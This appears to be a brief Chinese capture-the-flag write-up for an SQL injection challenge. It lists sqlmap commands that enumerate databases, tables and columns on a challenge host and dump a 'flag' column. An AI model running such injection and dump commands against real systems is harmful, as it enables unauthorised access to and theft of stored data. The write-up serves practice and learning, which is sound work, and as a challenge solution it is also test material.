网址有提示wllm
尝试http://node4.anna.nssctf.cn:28075/?wllm=1
我们尝试sqlmap注入一下
sqlmap -u "http://node4.anna.nssctf.cn:28075/?wllm=1" --dbs
sqlmap -u "http://node4.anna.nssctf.cn:28075/?wllm=1" -D test_db -tables
sqlmap -u "http://node4.anna.nssctf.cn:28075/?wllm=1" -D test_db -T test_tb -columns
sqlmap -u "http://node4.anna.nssctf.cn:28075/?wllm=1" -D test_db -T test_tb -C flag --dump